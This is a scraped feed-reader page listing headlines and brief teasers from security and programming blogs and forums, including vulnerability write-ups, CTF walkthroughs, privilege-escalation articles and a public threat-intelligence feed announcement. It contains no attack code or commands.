    作者:墨云科技 VLab Team 原文链接:https://mp.weixin.qq.com/s/fFx1kQVfotbOqHlSjSJVMQ 漏洞简述 这是一个反序列化漏洞,是一条新的gadget,在低版本的JDK中可能会造成RCE风险。 漏洞分析 测试环境weblogic14c版本,测试JDK 1.8版本。 首先会调用BadAttributeValueExpException.read...
  • Open

    Why does my app send network requests when I open an SVG file?
    No content preview
    How to Setup MFA for Linux Machine
    No content preview
    Walkthrough — Hacktoria: Geolocation 12
    No content preview
    Send a Email to me and get kicked out of Google Groups !!
    No content preview
  • Open

    Why does my app send network requests when I open an SVG file?
    No content preview
    How to Setup MFA for Linux Machine
    No content preview
    Walkthrough — Hacktoria: Geolocation 12
    No content preview
    Send a Email to me and get kicked out of Google Groups !!
    No content preview
  • Open

    Why does my app send network requests when I open an SVG file?
    No content preview
    How to Setup MFA for Linux Machine
    No content preview
    Walkthrough — Hacktoria: Geolocation 12
    No content preview
    Send a Email to me and get kicked out of Google Groups !!
    No content preview
  • Open

    使用动态时间规整 (DTW) 解决时间序列相似性度量及河流上下游污染浓度相似性识别分析 - 鸣梦
    时间序列相似性度量方法 时间序列相似性度量常用方法为欧氏距离ED(Euclidean distance)和动态时间规整DTW(Dynamic Time Warping)。总体被分为两类: 锁步度量(lock-step measures) 和弹性度量(elastic measures) 。锁步度量是时  ( 1 min )
    在线pdf请你谨慎打开 - 踩刀诗人
    本篇其实算之前安全整改话题的一点补充,对之前内容感兴趣的可以走以下快捷通道: 安全漏洞整改系列(二) 安全漏洞整改系列(一) 背景 前不久某家客户对我们提供的系统又进行了一轮安全测试,其中有一条我觉得很有意思,也算是刷新了我的认知,那就是“pdf预览存在xss注入”,在此跟大家分享一波,也算是相互提
    CTO(技术总监)平时都在做些什么? - 程序员守护石
    ​目前创业,最后一家公司任职医疗科技公司的研发中心总经理,之前也在几家公司的任职研发/技术总监岗位,在我理解的范围,目前国内中小企业对于CTO/技术总监的岗位区别没有那么明确的职能区分。 1. 先总结 我先概要性总结一下CTO/技术总监的作用: ❶ CTO/技术总监应具有企业技术方向的整体把控力,也
    看SparkSql如何支撑企业数仓 - 字节跳动数据平台
    企业级数仓架构设计与选型的时候需要从开发的便利性、生态、解耦程度、性能、 安全这几个纬度思考。本文作者:惊帆 来自于数据平台 EMR 团队 前言 Apache Hive 经过多年的发展,目前基本已经成了业界构建超大规模数据仓库的事实标准和数据处理工具,Hive 已经不单单是一个技术组件,而是一种设计  ( 4 min )
    微信一面:什么是一致性哈希?用在什么场景?解决了什么问题? - 小林coding
    大家好,我是小林。 在逛牛客网的面经的时候,发现有位同学在面微信的时候,被问到这个问题: 第一个问题就是:一致性哈希是什么,使用场景,解决了什么问题? 这个问题还挺有意思的,所以今天就来聊聊这个。 发车! 如何分配请求? 大多数网站背后肯定不是只有一台服务器提供服务,因为单机的并发量和数据量都是有限  ( 1 min )
    如何在 Flutter 中集成华为云函数服务 - 华为开发者论坛
    介绍 云函数是一项 Serverless 计算服务,提供 FaaS(Function as a Service)能力,可以帮助开发者大幅简化应用开发与运维相关事务,降低应用功能的实现门槛,快速构建业务能力。下面将介绍如何在 Flutter 框架下集成云函数。 集成步骤 1. 安装 flutter 环  ( 1 min )
    JVM基础学习(二):内存分配策略与垃圾收集技术 - Huangzzzzz
    Java与C++之间有一堵由内存动态分配和垃圾收集技术所围成的高墙,墙外面的人想进去,墙里面的人却想出来 垃圾收集概述 Java内存模型中的堆和方法区是垃圾收集技术所需要关注的终点,因为其他的区域会跟随线程的结束而自动回收。 而需要解决垃圾收集的首要目标便是解决如何判断一个对象已经不需要了从而自动进
    【曹工杂谈】Mysql-Connector-Java时区问题的一点理解--写入数据库的时间总是晚13小时问题 - 三国梦回
    背景 去年写了一篇“【曹工杂谈】Mysql客户端上,时间为啥和本地差了整整13个小时,就离谱 ”,结果最近还真就用上了。 不是我用上,是组内一位同事,他也是这样:有个服务往数据库insert记录,记录里有时间,比如时间A。然后写进数据库后,数据库里的时间是A-13,晚了13小时。然后就改了这么个地方  ( 1 min )
    『无为则无心』Python基础 — 44、对文件和文件夹的操作 - 繁华似锦Fighting
    1、os模块介绍 os模块提供了多数操作系统的功能接口函数。当os模块被导入后,它会自适应于不同的操作系统平台,根据不同的平台进行相应的操作。 在Python编程时,os模块可以处理文件和目录这些我们日常手动需要做的操作,例如:显示当前目录下所有文件、删除某个文件、获取文件大小等等。 在Python  ( 1 min )
    疑难杂症:运用 transform 导致文本模糊的现象探究 - ChokCoco
    在我们的页面中,经常会出现这样的问题,一块区域内的文本或者边框,在展示的时候,变得特别的模糊,如下(数据经过脱敏处理): 正常而言,应该是这样的: emmm,可能大图不是很明显,我们取一细节对比,就非常直观了: 何时触发这种现象? 那么?什么时候会触发这种问题呢?在 Google 上,其实我们能搜到  ( 1 min )
    LibOpenCM3(一) Linux下命令行开发环境配置 - Milton
    LibOpenCM3 是GPL协议(LGPL3)的Cortex-M系列的固件库, 支持stm32、atmel、nxp系列单片机. 这个固件库对标的是 CMSIS, 但是比 CMSIS 提供更多的方法接口, 实现度介于 CMSIS 和 SPL 之间. 对于常见的 STM32F1 系列, 代码已经基本稳...  ( 3 min )
    VS Code开发TypeScript - 寻找无名的特质
    本文概要介绍使用VS Code开发TypeScript的过程。  ( 1 min )
    Spring中的Environment外部化配置管理详解 - 跟着Mic学架构
    Environment的中文意思是环境,它表示整个spring应用运行时的环境信息,它包含两个关键因素 profiles properties profiles profiles这个概念相信大家都已经理解了,最常见的就是不同环境下,决定当前spring容器中的不同配置上下文的解决方案。比如针对开发环  ( 1 min )
    从零开始, 开发一个 Web Office 套件(4):新的问题—— z-index - 赵康
    《从零开始, 开发一个 Web Office 套件》系列博客目录 这是一个系列博客, 最终目的是要做一个基于HTML Canvas 的, 类似于微软 Office 的 Web Office 套件, 包括: 文档, 表格, 幻灯片... 等等. 对应的Github repo 地址: https://g  ( 1 min )
    vivo 服务端监控架构设计与实践 - vivo互联网技术
    一、业务背景 当今时代处在信息大爆发的时代,信息借助互联网的潮流在全球自由的流动,产生了各式各样的平台系统和软件系统,越来越多的业务也会导致系统的复杂性。 当核心业务出现了问题影响用户体验,开发人员没有及时发现,发现问题时已经为时已晚,又或者当服务器的CPU持续增高,磁盘空间被打满等,需要运维人员及  ( 1 min )
    通过Dapr实现一个简单的基于.net的微服务电商系统(十九)——分布式事务之Saga模式 - a1010
    在之前的系列文章中聊过分布式事务的一种实现方案,即通过在集群中暴露actor服务来实现分布式事务的本地原子化。但是actor服务本身有其特殊性,场景上并不通用。所以今天来讲讲分布式事务实现方案之saga模式,并在文后附上代码供各位读者参考,评论。 目录:一、通过Dapr实现一个简单的基于.net的微  ( 1 min )
    上周热点回顾(2.14-2.20) - 博客园团队
    热点随笔: · 2021年度总结 | 葡萄城软件开发技术回顾(下) (葡萄城技术团队)· 从MVC到DDD的架构演进 (木小丰)· 3.6 万颗星!开源 Web 服务器后起之秀,自带免费 HTTPS 开箱即用 (削微寒)· ASP.NET Core 6框架揭秘实例演示[01]: 编程初体验 (Art
    私有化轻量级持续集成部署方案--04-私有代码仓库服务-Gitea - 莫问今朝乄
    提示:本系列笔记全部存在于 Github, 可以直接在 Github 查看全部笔记 企业级最流行的私有代码仓库是 Gitlab, 一开始我也打算部署 Gitlab作为私有代码仓库。 但部署完成后发现, Gitlab 资源占用太大了。优化之后也要占用 3g 内存,最后只好放弃这一方案。 随后发现了 G  ( 2 min )
    微服务从代码到k8s部署应有尽有系列(四、用户中心) - 万俊峰Kevin
    我们用一个系列来讲解从需求到上线、从代码到k8s部署、从日志到监控等各个方面的微服务完整实践,整个项目使用了go-zero开发,基本包含了go-zero以及go-zero作者开发的一些中间件,所用到的技术栈基本是go-zero的自研组件。  ( 1 min )
    四探循环依赖 → 当循环依赖遇上 BeanPostProcessor,爱情可能就产生了! - 青石路
    开心一刻 那天知道她结婚了,我整整一个晚上没睡觉,开了三百公里的车来到她家楼下,缓缓的抽了一支烟...... 天渐渐凉了,响起了鞭炮声,迎亲车队到了,那天披着婚纱的她很美,真的很美! 我跟着迎亲车队开了几公里的时候,收到了她的信息:别送了,别送了,你的手扶拖拉机太响了 ...... 前情回顾 楼主一  ( 1 min )
  • Open

    How To Integrate or Query My Public STIX STIX2 TAXII Threat Actor Specific Threat Intelligence Feed In Your Firewall or Security Solution - An Analysis
    Dear blog readers, Did you already pull my public and free STIX STIX2 TAXII threat intelligence feed using your and your organization's Lifetime API Key? In this post I've decided to elaborate more and offer practical advice and links in terms of how you can pull and integrate my daily updated STIX STIX2 TAXII threat intelligence feed in your firewall or security solution and how you can actually use your Lifetime API Key for my feed in Maltego for possible enrichment of your IoCs (Indicators of Compromise). Here's your Lifetime API Key for you and your organization - f8aa0cca-a0ac-4eff-9c03-1c86ad7aee93 Portal: https://ddanchev.ngrok.io API: https://ddanchev.ngrok.io/graphql API Documentation: https://luatix.notion.site/GraphQL-API-cfe267386c66492eb73924ef059d6d59 API Client: https://opencti-client-for-python.readthedocs.io/en/3.3.0/pycti/pycti.html API requirements: https://github.com/amr-cossi/opencti-maltego/blob/master/config.py.sample TAXII Collection: https://ddanchev.ngrok.io/taxii2/root/collections/c2259b20-9c60-4ddd-8931-8de970440f06/objects Bearer Token Authentication Required: https://github.com/OpenCTI-Platform/opencti/issues/1198 Maltego transforms available: - https://www.maltego.com/downloads/ - https://www.maltego.com/transform-hub/opencti/ - https://www.maltego.com/transform-hub/stix/ As always feel free to drop me a line at dancho.danchev@hush.com in case you have any questions. Full list of solutions compatible with STIX STIX2 and TAXII EventLog Analyzer ThreatConnect Azure Sentinel Splunk Cisco Elemendar Cortex XSOAR TrendMicro ArcSight Microsoft Sentinel EventTracker Plixer Scrutinizer Sumo Logic Kaspersky CyberTrace ServiceNow CheckPoint ThreatCloud Carbon Black EDR Cisco Email Gateway ThreatConnect LogPoint Tanium Symantec LogRhythm Infoblox Cloudera Sample screenshots of my STIX STIX2 TAXII Threat Intelligence feed in combination with Maltego: Enjoy!

  • Open

    Inventing Anna, engenharia social e OSINT, qual o prospecto para o futuro no quesito de segurança…
    O quanto de informação pessoal e íntima divulgamos nas mídias sociais de forma espontânea e despreocupada? Continue reading on Medium »  ( 3 min )
    Walkthrough — Hacktoria: Geolocation 13
    Thirteen. Unlucky for some. Let’s see how you could solve Hacktoria’s practice challenge: Geolocation 13. I confess I was very excited… Continue reading on Medium »  ( 3 min )
  • Open

    Analysis of CVE-2021-36260: Exploited in the Wild Hikvision Camera Vulnerability
    submitted by /u/chicksdigthelongrun [link] [comments]
    rconn - Consume services behind NAT or firewall without opening ports or port-forwarding
    submitted by /u/jafarlihi [link] [comments]  ( 1 min )
    Running Cobalt Strike BOFs from Python
    submitted by /u/naksyn_ [link] [comments]
  • Open

    Interesting Stored XSS
    Hey there! My name is Faizan and this write up is about an interesting Stored XSS I found earlier today! If you know what an XSS aka Cross… Continue reading on Medium »  ( 1 min )
    Give me a browser, I’ll give you a shell
    A restricted browser, that’s all you have… what do you do? Continue reading on Medium »  ( 3 min )
    Burp Suite Tool — Overview and Usage
    Burp Suite is an intercepting tool which can be used to capture and manipulate all of the data traffic between Client and Server. This… Continue reading on Medium »  ( 2 min )
    Send a Email to me and get kicked out of Google Groups !!
    A Feature that almost broke Google Groups !! Continue reading on InfoSec Write-ups »  ( 3 min )
    How I make money with Hacking …
    Hello Everyone, This is Abhishek Kashniyal, I am a CSE student with specialization in Cyber Security & Forensics, a constant learner and… Continue reading on Medium »  ( 2 min )
    BugBounty: Algolia key disclosure vulnerability
    What is Algolia? Continue reading on Medium »  ( 1 min )
  • Open

    A bunch of rock music
    http://djbloom.info/Music/My%20Music/ submitted by /u/CalmWater8439 [link] [comments]  ( 1 min )
    I'm bad at coding. How do I create an Open Directory from scratch?
    Just what the title says. I have some music, movies, documents, etc that I'd like to share, but I don't want to take up or make an entire Google Drive account just for some files. Any help getting started would be greatly appreciated! submitted by /u/Reggie_Smith_89 [link] [comments]  ( 4 min )
  • Open

    I want to know what a day in a life looks like as a infosec analyst. also what would company’s look for when hiring a junior infosec analyst
    what would a company look for when hiring junior infosec analysts? i just started as a junior help desk technician and i hear that experience is better than certs i just want to get an idea of what a company will look for when hiring a junior infosec analyst also is it possible to go from help desk to infosec? submitted by /u/Jkarl0880 [link] [comments]  ( 1 min )
    Any suggestions for gaining resume-worthy experience in cloud security?
    I pivoted from a technical security role to a customer facing technical/management role for a cybersecurity SaaS company a couple years ago. I’ve been considering getting back into the security engineering/architect side of things. One area I’m finding seems to be a requirement for most roles is experience in cloud security like mastery of AWS. I’m also noticing requirements for experience in container tools such as Kubernetes. This isn’t experience I can gain on the job right now. Any suggestions on how I can get experience that matters for these technologies? I don’t want to fall behind and lose any chance of working in a direct security role again submitted by /u/7heJoker [link] [comments]  ( 1 min )
    SAP CVE-2022-22536 technical analysis?
    Anybody by some chance has some sources on the new CVE of score 10 impacting SAP NetWeaver? I can't find any details of the specific vulnerable mechanism that allowed the request smuggling. Thanks :) submitted by /u/Altiverses [link] [comments]  ( 1 min )
    What are the prerequisite skills/knowledge for reverse engineering?
    Trying to learn reverse-engineering and binary exploitation and I came across this playlist, Watched a few videos but didn't got a thing, it feels like I'm missing some knowledge gaps in between, Can someone please give me a clear roadmap so that I can start using Radare2? ​ Edit: after radare, I wanna learn Ghidra lol submitted by /u/The_Intellectualist [link] [comments]  ( 2 min )
    How is your day as an entry-level SOC
    I have recently interviewed for an entry-level SOC role, and my expectation is a bit mixed. It is a cybersecurity company that provides services such as SIEM monitoring, pen-testing, threat hunting, etc. The X company has 5 people, including the CEO and CTO. And around 300 customers. The role is to sit with the SOC team, check alerts, and then give customers a summary each quarter of what happened within that period. The job title was listed as a cyber security engineer, and the job description mentioned Analysis of security incidents Incident Response Teams Threat Hunting Security advice During the interview, they asked me two times specifically how I felt about giving security advice to customers, is it normal that the junior SOC gives security advice to customers? Or is this a good way to get into the "cyber world", then apply for new jobs after 1 year? Going to graduate with my BS this summer, so trying to land a job before I graduate. submitted by /u/PapiPoseidon [link] [comments]  ( 1 min )
  • Open

    擅长捉弄的内存马同学:Servlet内存马
    Servlet内存马的最后一篇,直接从加载开始说起。  ( 1 min )
  • Open

    SecWiki News 2022-02-20 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-02-20 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Telegram vs Cellebrite
    "Telegram for iOS: Access and decode secret chats which can only be accessed on their devices of origin. You can also recover deleted messages." im in too deep this forensic thingy is kinda exciting and im in a business major. I guess one can really recover deleted telegram chats using cellebrite! amazing submitted by /u/b4dboyrere [link] [comments]  ( 1 min )
    Apple iCloud Productions
    What kind of data are included in apple icloud productions ? do they include permanently deleted files notes, media? submitted by /u/b4dboyrere [link] [comments]  ( 1 min )
    jump from IT Audit into computer forensics
    hello friends to make things short, I am an IT Auditor with 1.5 years of experience, and I hate the part of dealing with people in IT Audit. but its very essential to deal with people there. so decided to jump to forensics, do you people deal with humans or simply have to worry about machines and that is it? and, i am cisa certified, will that help? what certification do you suggest taking for computer forensics? and how is the pay for IT Audit vs Computer forensics? in short, do you recommend the shift or not? thx submitted by /u/ItchyPilot9804 [link] [comments]  ( 2 min )
  • Open

    [Cullinan #27] Improve cullinan and Added more..
    컬리넌 로그 #27입니다. 조금 오랜만에 올리게되는 것 같습니다. Add category cullinan Add OWASP ZAP Add Insecure Deserialization Change SQLMap (Add scanning to X) ZAP과 Insecure Deserialization이 새로 추가됬고, SQLMap 쪽에 일부 수정이 있었습니다. ZAP은 아마… 수정을 굉장히 자주하게 될 것 같습니다. 양이 워낙 방대해서리 😵‍💫 그리고 Cullinan 전체적으로 기능들을 좀 더 추가중인데, 첫 단추로 categories 적용이 완료되었습니다. 그럼 이만 👋🏼
    Insecure Deserialization
    🔍 Introduction Insecure Deserialization은 직역한 그대로 안전하지 않은 역직렬화를 의미합니다. Deserialization 시 개발자가 의도하지 않은 Object 까지 Deserialize하여 비즈니스 로직상의 문제를 발생시키거나, 조건에 따라서는 어플리케이션이 공격자가 의도한 코드를 수행하게끔 구성할 수 있어 리스크가 높습니다. 먼저 Serialization/Deserialization 을 알아보면 보통 개발 과정에서 메모리에 있는 Object를 파일 등 외부의 데이터로 변환하는 과정을 Serialization, 반대로 파일 등 외부에 있는 데이터를 프로그램 내 Object로 변환하는 과정을 Deserialization이라고 합니다. 🗡 Offensive techniques Detect Deserialization은 소스코드를 보지 않은 상태에선 명확하게 Deserialization 프로세스라고 확신하기 어렵습니다.
    OWASP ZAP
    Introduction ZAP(Zed Attack Proxy)은 OWASP의 Flagship 프로젝트로 Vulnerability Assessment, Penetration Testing, Runtime Testing, Code Review를 위한 보안 테스팅 도구이자 취약점 스캐너입니다. Burpsuite와 함께 보안 엔지니어, 버그바운티헌터 등의 주력 도구로 사용되고 있고, Cli command, REST API 그리고 Jenkins plugin, Github action 등을 제공하고 있어 DevSecOps 즉 CI/CD Pipeline 상에서의 DAST 스캐너로도 많이 사용되고 있습니다. 개인적으로 정말 좋아하는 프로젝트입니다. 다른건 몰라도 Fuzzer / Scripting은 비교할 수 있는 도구가 없습니다. 최고에요! Installation 아래 URL에서 각 OS 맞는 Installer 패키지를 통해 설치하시면 됩니다.
  • Open

    Self XSS in Create New Workspace Screen
    Mattermost disclosed a bug submitted by rynexxx: https://hackerone.com/reports/1442017 - Bounty: $50
  • Open

    The Red Cross Data Breach Exploited a ManageEngine Vulnerability by APT27
    Article URL: https://www.thecybersecuritytimes.com/the-red-cross-data-breach-exploited-a-manageengine-vulnerability-by-apt27/ Comments URL: https://news.ycombinator.com/item?id=30403952 Points: 1 # Comments: 1  ( 4 min )
  • Open

    Red Team Engagement Planning
    A short article outlining the phases to go through, while planning a red team engagement. Continue reading on Medium »  ( 2 min )

  • Open

    Privilege Escalation Vulnerability in Snapd
    Article URL: https://ubuntu.com/security/notices/USN-4728-1 Comments URL: https://news.ycombinator.com/item?id=30401324 Points: 1 # Comments: 0  ( 2 min )
  • Open

    Printer assigned a drive letter in Windows
    Has anyone else come across a printer that was assigned a drive letter? I’ve never seen this in my personal life but it stood out to me while I was working a case. In this instance, it was a Brother printer assigned to D:. Does doing this provide any additional functionality rather than just printing documents? submitted by /u/ebarboza311 [link] [comments]  ( 1 min )
  • Open

    Le guide ultime pour améliorer ses recherches concurrentielles sur Google
    Vous souhaitez améliorer vos requêtes lors d’une recherche sur votre concurrent ou sur votre marché ? Continue reading on Medium »  ( 3 min )
    Phishing Domain Tool — DnsTwist Part 2
    Dnstwist is an open-source tool used to identify phishing domains, Typosquatting domains, attack domains, and brand impersonate. Dnstwist… Continue reading on Medium »  ( 1 min )
    Walkthrough — Hacktoria: Geolocation 12
    And back again with another Hacktoria Geolocation challenge to solve. I love GEOINT challenges, especially when they force me to learn… Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    "The installation of this device is forbidden by system policy"
    I keep getting these notifications without me trying to install any new device or driver. I would like to know what is the source of this? I tried to look into my event viewer without success. submitted by /u/ak_z [link] [comments]  ( 1 min )
    Small matter: A Malwarebytes Privacy Guard and Privacy Badger basically doing the same thing. I've had a problem with my browser sticking and it might be conflicting extensions.
    Thank you. submitted by /u/jacobspartan1992 [link] [comments]  ( 1 min )
    Which framework should I learn or at least get familiar with first? (Ghidra, IDA, Radare2)
    Hey Chief, I'm trying to get ahead in reversing binaries, and I really ain't got any idea about which framework should I pick up first, Can you help? submitted by /u/The_Intellectualist [link] [comments]  ( 2 min )
    Soc 2 report
    Why SOC 2 report are made by CPA ? For SOC 1 I get it, but not SOC 2. How can they audit IT security being accountant? submitted by /u/Xctzn [link] [comments]  ( 2 min )
  • Open

    Windows Privilege Escalation: PrintNightmare
    Introduction Print Spooler has been on researcher’s radar ever since Stuxnet worm used print spooler’s privilege escalation vulnerability to spread through the network in nuclear The post Windows Privilege Escalation: PrintNightmare appeared first on Hacking Articles.  ( 9 min )
    Windows Privilege Escalation: PrintNightmare
    Introduction Print Spooler has been on researcher’s radar ever since Stuxnet worm used print spooler’s privilege escalation vulnerability to spread through the network in nuclear The post Windows Privilege Escalation: PrintNightmare appeared first on Hacking Articles.  ( 9 min )
  • Open

    SecWiki News 2022-02-19 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-02-19 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Querying Spotlight APIs With JXA
    TL;DR This blog post takes a brief look at how to use JXA (native JavaScript for Automation on macOS) to query Spotlight APIs. In… Continue reading on Medium »  ( 3 min )
  • Open

    Directory Traversal — what is it?
    Local File inclusion Continue reading on System Weakness »  ( 3 min )
    PORTSWIGGER WEB SECURITY - SSRF (SERVER SIDE REQUEST FORGERY) LAB ÇÖZÜMLERİ
    Bir web uygulamasında kullanılan veriler dış bir kaynak aracılığıyla alınıyorsa ve saldırgan web sunucusunun göndermiş olduğu istek… Continue reading on Medium »  ( 7 min )

  • Open

    Attackers Abuse Poorly Regulated Top-Level Domains in Ongoing Redirect Campaign
    One of the more common infections that we see are site-wide redirects to spam and scam sites, achieved by attackers exploiting newly found vulnerabilities in popular WordPress plugins. If you’ve ever been redirected to a page that looks something like this, then you’ve fallen victim to such an attack: Once the user clicks through the verification process they are sent to a fake CAPTCHA page asking the user to click to prove they are a human: As we have reported in the past on this type of infection: The goal is to trick visitors into clicking “Allow” when the site asks to subscribe to push notifications. Continue reading Attackers Abuse Poorly Regulated Top-Level Domains in Ongoing Redirect Campaign at Sucuri Blog.
  • Open

    SecWiki News 2022-02-18 Review
    利用IP分片污染攻击TCP流量 by ourren “红蓝对抗演练评分系统”开源框架 (preview) by ourren Web框架CSRF防御的有效性 by ourren PRIVGUARD:用于GDPR隐私合规的数据治理框架 by ourren 中间商之 Ntlm Relay 攻击分析 by ourren 网络安全工作你必须懂的"3保1评" by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    How Netsparker can help with AppSec compliance
    Demonstrating web application compliance with various security standards and practices is crucial in many industries. To help you scan applications and prepare reports for common web security compliance requirements, Netsparker by Invicti comes with a host of predefined compliance checks and reports, including OWASP Top 10, PCI DSS, HIPAA, NIST SP 800-53, and more. READ MORE  ( 7 min )

  • Open

    Public STIX STIX2 TAXII Threat Actor Specific Threat Intelligence Feed - Your Lifetime API Key!
    Hi, everyone, This is Dancho. Big news! I've decided to make approximately 15 years of active and unique threat actor specific research publicly accessible online for free using the OpenCTI STIX STIX2 TAXII platform and not only convert all the cool and juicy and full of never-published and discussed before niche threat actors both internationally and in Russia but also make them into a free STIX STIX2 TAXII threat intelligence feed and turn them into a machine readable format with the idea to centralize and speed up the communication of my research and potentially allow you to better catch up improve your situational awareness and learn new things about the international bad guys including the bad guys in Russia including their Internet infrastructure and catch up with who they are and w…

  • Open

    Adobe Patches Critical RCE Vulnerability in Magento2
    On Sunday, February 13th, Adobe pushed an emergency update to their Magento2 ecommerce software patching a critical unauthenticated remote code execution vulnerability. It is marked as CVE-2022-24086 with a CVSS score of 9.8. Website administrators of Magento stores should patch immediately. Shop owners of Magento 2.3 or 2.4 stores can find the patch to install here. Instructions on how to install Magento security patches via Composer can be found here. Our website firewall generic rules block RCE exploitation attempts by default but given the severity of the vulnerability website administrators should not leave their websites unpatched. Continue reading Adobe Patches Critical RCE Vulnerability in Magento2 at Sucuri Blog.
  • Open

    Windows Privilege Escalation: SpoolFool
    Introduction Oliver Lyak posted a write-up about a Windows Privilege Escalation vulnerability that persisted in Windows systems even after patching of previous vulnerabilities in Print The post Windows Privilege Escalation: SpoolFool appeared first on Hacking Articles.  ( 8 min )
    Windows Privilege Escalation: SpoolFool
    Introduction Oliver Lyak posted a write-up about a Windows Privilege Escalation vulnerability that persisted in Windows systems even after patching of previous vulnerabilities in Print The post Windows Privilege Escalation: SpoolFool appeared first on Hacking Articles.  ( 8 min )

  • Open

    How do I secure WordPress Websites for Free?
    Protecting Content Management Systems (CMS) installed on a hosting server is crucial in today’s ever-growing world wide web, but how to I protect my WordPress website on a tight budget? There are tons of options available on this front, but it can be overwhelming to make the right decision in website protection that fits into your budget. In this article, however, we’ll be covering the basics of efficiently securing your WordPress website at no cost.  Continue reading How do I secure WordPress Websites for Free? at Sucuri Blog.
  • Open

    Horizontall HackTheBox Walkthrough
    Introduction Horizontall is an “easy” rated CTF Linux box on Hack The Box platform. The box covers initial compromise by exploiting Strapi RCE vulnerability and The post Horizontall HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
    Horizontall HackTheBox Walkthrough
    Introduction Horizontall is an “easy” rated CTF Linux box on Hack The Box platform. The box covers initial compromise by exploiting Strapi RCE vulnerability and The post Horizontall HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )

  • Open

    Netsparker Enterprise achieves WCAG 2.1 accessibility compliance
    Invicti is proud to break down barriers of access in software. Learn more about how we’ve achieved WCAG 2.1 AA compliance for accessibility standards. READ MORE  ( 3 min )

  • Open

    Who Needs A Niche Threat Actor Specific IoC (Indicator of Compromise) STIX/STIX2/TAXII Feed?
    UPDATE: The feed's official web site including the brochure. Dear blog readers, Who needs access to my STIX/STIX2/TAXII Threat Actor Specific IoC (Indicator of Compromise) feed? Drop me a line today at dancho.danchev@hush.com Stay tuned!

  • Open

    곧 Chrome에서 document.domain을 설정할 수 없습니다 ⚠️
    Chrome will disable modifying document.domain to relax the same-origin policy 구글에서 최근 document.domain에 대한 크롬 브라우저의 변경을 예고했습니다. 브라우저 3사는 서로 유사하게 정책을 가져가기 때문에 아마 firefox, safari도 비슷한 형태로 변화될 가능성이 높겠죠. 요약하자면 Chrome 106+ 이후부턴 기본적으로 document.domain에 대한 setter가 제거된다고 합니다. document.domain 사실 document.domain은 문제가 좀 있습니다. document.domain이 도메인의 포트 번호 부분을 무시하기 때문에 만약 동일한 도메인에서 포트가 다른 서비스로 서빙되는 경우 원래대로면 서로는 same-origin이 아니지만, document.
    ZAP의 새로운 Networking Stack
    지난 목요일 밤 ZAP Developers Groups에 simon이 한가지 내용을 공유했습니다. 바로 ZAP의 Networking Layer에 대한 이야기고, 저는 제목을 보자마자 어떤 내용인지 직감했습니다. (제가 정말 기다렸던 내용이거든요 🤩) Weekly 버전에선 networking stack이 달라졌어! 어떤 것을 개선하기 위해 이러한 작업이 진행되었는지, 그리고 어떻게 바뀌었고 앞으로 어떻게 될지 미리 살펴봅시다 :D Why? 먼저 Networking stack, layer는 실제로 사용자에게 보이는 부분은 별로 없습니다. Application 내부에서 네트워크를 처리하기 위한 부분인데, ZAP은 오래된 프로젝트다 보니 베이스로 사용된 Networking 부분이 오래된 Apache Commons HttpClient library를 사용했었습니다.

  • Open

    How to Choose a Security Plugin That’s Right for Your Website
    Finding the perfect security plugin for your website is important, but it’s also crucial you find the proper one that suits your needs. WordPress plugins are a dime a dozen, so we’ll be discussing how to narrow your options and what to look for in a reliable plugin so you can safely install it on your website. Some of the most frequent issues with poorly managed plugins include eating up memory in excess, 500 internal server errors, downtime, white pages, and slow response times. Continue reading How to Choose a Security Plugin That’s Right for Your Website at Sucuri Blog.
  • Open

    AppSec best practices for security that sticks
    In the complex and dynamic world of application security, best practices are your best friends. This post shows how you can build an effective AppSec program based on tried and tested workflows and tools for vulnerability testing and remediation. READ MORE  ( 6 min )

  • Open

    Custom Payloads로 ZAP 스캐닝 강화 🚀
    오늘은 제가 최근에 ZAP에서 약간 관심있게 보고있던 기능 하나를 소개해드릴까 합니다. 바로 Custom Payloads인데요. Fuzzer나 ZAP의 Scripting engine을 사용하지 않고 조금 더 쉽게 지정된 페이로드 기반으로 테스트를 할 수 있어서 알아두시면 보안 테스팅이나 자동화 구현에서 잘 사용하실 수 있을거란 생각이 듭니다. 그럼 시작해보죠 :D Custom Payloads Custom Payloads는 ZAP의 Active Scan, Passive Scan에서 사용자가 지정한 Payloads를 기반으로 사용할 수 있도록 제공해주는 기능이자 Addon입니다. 현재까진 2개의 카테고리를 사용할 수 있으며, 스캔에 붙어서 돌기 때문에 카테고리가 늘어날 수록 기능의 이점이 점점 커질거란 생각이 듭니다.

  • Open

    Top 10 Security Tips to Keep Your WordPress Site Healthy
    As we go through the winter months and whether changes, many of us go to our local pharmacy and take advantage of a flu shot. We do this because maybe we have had the flu before and the second of pain from the jab is nothing in comparison to the hours and days of sickness from catching the flu bug.  As everyone’s grandparents tell them, “An ounce of prevention is worth a pound of cure. Continue reading Top 10 Security Tips to Keep Your WordPress Site Healthy at Sucuri Blog.

  • Open

    How to Get Rid of the Most Common Types of SEO Spam
    What is SEO Spam? SEO spam is what attackers will inject into a website to attempt to use your SEO ranking for something else not ranked otherwise that will further the attackers’ objective. They spam and destroy the website while trying to generate revenue or achieve some other goal. Due to this, generally, the website owner is completely unaware of what’s going on unless they receive warnings or are added to blocklists. Usually, a hacker will try to avoid being detected by rearranging links that aren’t visible to the average site visitor and only crawlers/index engines can see it.  Continue reading How to Get Rid of the Most Common Types of SEO Spam at Sucuri Blog.

  • Open

    Linux Privilege Escalation: PwnKit (CVE 2021-4034)
    Introduction Team Qualys discovered a local privilege escalation vulnerability in PolicyKit’s (polkit) setuid tool pkexec which allows low-level users to run commands as privileged users. The post Linux Privilege Escalation: PwnKit (CVE 2021-4034) appeared first on Hacking Articles.  ( 5 min )
    Linux Privilege Escalation: PwnKit (CVE 2021-4034)
    Introduction Team Qualys discovered a local privilege escalation vulnerability in PolicyKit’s (polkit) setuid tool pkexec which allows low-level users to run commands as privileged users. The post Linux Privilege Escalation: PwnKit (CVE 2021-4034) appeared first on Hacking Articles.  ( 5 min )

  • Open

    Paragraph Separator(U+2029) XSS
